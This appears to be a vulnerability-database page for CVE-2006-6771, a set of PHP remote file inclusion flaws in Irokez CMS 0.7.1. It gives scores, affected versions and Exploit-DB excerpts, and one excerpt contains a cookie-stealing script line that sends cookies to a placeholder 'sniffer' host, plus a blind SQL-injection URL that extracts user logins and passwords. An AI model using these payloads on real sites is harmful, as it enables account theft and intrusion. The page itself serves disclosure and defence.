CVE-2006-6771
published 2006-12-27CVE-2006-6771: Multiple PHP remote file inclusion vulnerabilities in Irokez CMS 0.7.1 and earlier, when register_globals is enabled, allow remote attackers to execute…
PriorityP336medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
2.15%
79.8th percentile
Multiple PHP remote file inclusion vulnerabilities in Irokez CMS 0.7.1 and earlier, when register_globals is enabled, allow remote attackers to execute arbitrary PHP code via a URL in the (1) GLOBALS[PTH][func] parameter in (a) scripts/gallery.scr.php; the (2) GLOBALS[PTH][spaw] parameter in (b) scripts/xtextarea.scr.php; and the (3) GLOBALS[PTH][classes] parameter in (c) sitemap.scr.php, (d) news.scr.php, (e) polls.scr.php, (f) rss.scr.php, (g) search.scr.php in scripts/, and (h) form.fun.php, (i) general.func.php, (j) groups.func.php, (k) js.func.php, (l) sections.func.php, and (m) users.func.php in functions/.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| irokez | irokez_cms | <= 0.7.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities
exploitdb·2009-02-27
CVE-2006-6771 Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities
Irokez Blog 0.7.3.2 - Multiple Input Validation Vulnerabilities
---
source: https://www.securityfocus.com/bid/33931/info
Irokez Blog is prone to multiple input-validation vulnerabilities:
- A cross-site scripting issue
- An SQL-injection issue
- Multiple remote file-include issues
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, execute arbitrary code, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Irokez Blog 0.7.3.2 is vulnerable; other versions may also be affected.
img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie;
http://www.example.com/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 1
Exploit-DB
Irokez Blog 0.7.1 - Multiple Remote File Inclusions
exploitdb·2006-12-25
CVE-2006-6771 Irokez Blog 0.7.1 - Multiple Remote File Inclusions
Irokez Blog 0.7.1 - Multiple Remote File Inclusions
---
+-------------------------------------------------------------------------------------------
+ Irokez CMS
+-------------------------------------------------------------------------------------------
+ Details:
+ Irokez CMS has several scripts which do not initialize variables before using them to include
+ files, assuming register_globals = on, we can initialize any one of the variables in a query
+ string and include a remote file of our choice.
+
+ Vulnerable Code:
+ scripts/gallery.scr.php, line(s) 11-12:
+ -> 11: require_once "{$GLOBALS['PTH']['func']}gallery.func.php";
+ -> 12: require_once "{$GLOBALS['PTH']['classes']}gallery.class.php";
+ scripts/sitemap.scr.php, line(s) 13:
+ -> 13: include_once $GLOBALS['PTH']['classes'] .
No writeups or analysis indexed.
http://secunia.com/advisories/23497http://www.securityfocus.com/bid/21769http://www.vupen.com/english/advisories/2006/5178https://www.exploit-db.com/exploits/3007http://secunia.com/advisories/23497http://www.securityfocus.com/bid/21769http://www.vupen.com/english/advisories/2006/5178https://www.exploit-db.com/exploits/3007
2006-12-27
Published